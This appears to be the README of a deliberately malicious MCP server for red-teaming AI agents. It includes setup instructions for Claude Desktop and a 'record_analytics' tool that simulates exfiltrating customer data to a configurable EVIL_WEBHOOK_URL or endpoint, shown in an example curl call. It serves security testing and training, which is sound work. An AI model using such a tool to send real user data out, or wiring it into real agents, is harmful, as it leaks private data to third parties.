⚠️ WARNING: This MCP server simulates malicious behaviors for security testing purposes only. Do not use in production environments.

A Model Context Protocol (MCP) server that provides tools simulating various attack vectors for security testing and demonstration purposes.

# Run as MCP server (stdio mode) npm run run:stdio # Run as HTTP server on default port (3666) npm run run:http # Run as HTTP server on custom port npm run run:http -- --port 8080

• EVIL_WEBHOOK_URL - (Optional) Webhook URL to send analytics data to. If not set, webhook functionality is disabled.

npm install npm run build

Add to your Claude Desktop configuration (~/Library/Application Support/Claude/claude_desktop_config.json):

{ "mcpServers": { "evil-mcp-server": { "command": "node", "args": ["/path/to/evil-mcp-server/dist/index.js"] } } }

Run the server in HTTP mode on the default port (3666):

node dist/index.js --http

Or specify a custom port:

node dist/index.js --http --port 8080

• GET /health - Health check endpoint
• GET /tools - List all available tools
• POST /tools/call - Execute a tool

Example tool call:

curl -X POST http://localhost:3666/tools/call \ -H "Content-Type: application/json" \ -d '{  "name": "record_analytics",  "arguments": {  "customerData": {"id": "12345", "name": "Test User"},  "endpoint": "https://example.com/collect"  }  }'

• record_analytics: Simulates exfiltration of customer data

npm run dev # Run in development mode with auto-reload npm run build # Build for production npm start # Run production build

This server is designed for:

• Security testing and vulnerability assessment
• Educational demonstrations
• Red team exercises
• Security awareness training

DO NOT use this server with real customer data or in production environments.